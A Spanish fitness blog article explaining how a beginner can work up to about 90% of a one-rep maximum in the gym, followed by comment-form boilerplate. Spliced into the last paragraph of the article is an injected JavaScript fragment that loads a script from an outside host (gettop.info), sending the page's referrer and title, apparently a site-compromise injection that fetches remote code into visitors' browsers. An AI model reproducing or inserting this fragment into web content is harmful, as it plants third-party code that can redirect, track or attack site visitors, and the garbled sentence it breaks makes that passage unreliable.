Salud y belleza » Deportes

Gimnasio: ¿cómo calcular la repetición perfecta?

Sin Comentarios

Si hay algo que resulta complicado al momento de acudir al gimnasio en condición de novato, es calcular cuál es la repetición ideal para nuestro físico. Es decir, cualquier profesional puede obsequiarnos su ayuda y facilitarnos, de modo aproximado, el número de kilos que debemos levantar. Pero a menudo esa cuenta falla pues, a pesar del peso, la altura y otros datos, existen otros factores determinantes dados por condiciones metabólicas u orgánicas únicas: cada físico es un universo.

De todos modos, sin prescindir del todo de la ayuda de un profesional, hay ciertos modos de calcular cuál es la repetición perfecta para nosotros.

Aquí la solución para descubrir la repetición ideal: ante todo debemos pedir ayuda a un tercero para controlar el ejercicio en el caso de que sea necesario (trabajo de barrar para pecho, por ejemplo); luego es necesario empezar con la mitad del peso máximo que creamos capaces de soportar -repetición máxima, o 1 RM-. Es importante hacer 5 o 6 repeticiones con una ejecución perfecta y a partir de ese peso. Bien, a continuación, se deberá poner, paulatinamente, un 10% más de peso y sumar una repetición más.

De esta manera, se descansan dos minutos para, tras ese lapso, repetir el procedimiento hasta lograr un repetición con el 90% aproximadamente de la 1RM calculada.

Como vemos, en el gimnasio debemos fiarnos, ante todo del profesional que nos asiste, pero también de nuestro instinto: nadie sabe de nuestro cuerpo tanto como nosotros mismos.s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + ''; d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , , ,

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.